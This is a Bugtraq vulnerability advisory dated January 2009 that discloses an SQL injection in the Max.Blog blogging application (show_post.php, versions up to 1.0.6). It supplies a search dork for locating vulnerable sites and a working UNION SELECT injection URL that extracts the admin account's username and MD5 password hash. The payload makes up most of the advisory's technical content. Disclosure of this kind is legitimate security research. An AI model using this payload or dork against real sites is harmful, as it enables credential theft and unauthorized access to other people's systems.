Max.Blog <= 1.0.6 (show_post.php) SQL Injection Vulnerability

From: Salvatore "drosophila" Fresta <drosophilaxxx@gmail.com>
To: Bugtraq <bugtraq@securityfocus.com>
Cc:
Subject: Max.Blog <= 1.0.6 (show_post.php) SQL Injection Vulnerability
Date:


###################             Salvatore "drosophila" Fresta  ###################


Application: Max.Blog
                           http://www.mzbservices.com
Version:         Max.Blog <= 1.0.6
Bug:                 * SQL Injection
Exploitation:       Remote
Dork:                        intext:"Powered by Max.Blog"
Date:                20 Jan 2009
Discovered by:  Salvatore "drosophila" Fresta
Author:             Salvatore "drosophila" Fresta
                    e-mail: drosophilaxxx@gmail.com
                    

############################################################################

- BUGS

SQL Injection:

        File affected: show_post.php

  This bug allows a guest to view username and password (md5) of a
   registered user with the specified id (usually 1 for the admin)

       http://www.site.com/path/show_post.php?id=-1'+UNION+ALL+SELECT+1,concat('username:
', username),concat('password: ',
password),4,5,6,7+FROM+users+WHERE+id=1%23

############################################################################


-- 
Salvatore "drosophila" Fresta
CWNP444351





Copyright © 1995-2019 LinuxRocket.net. All rights reserved.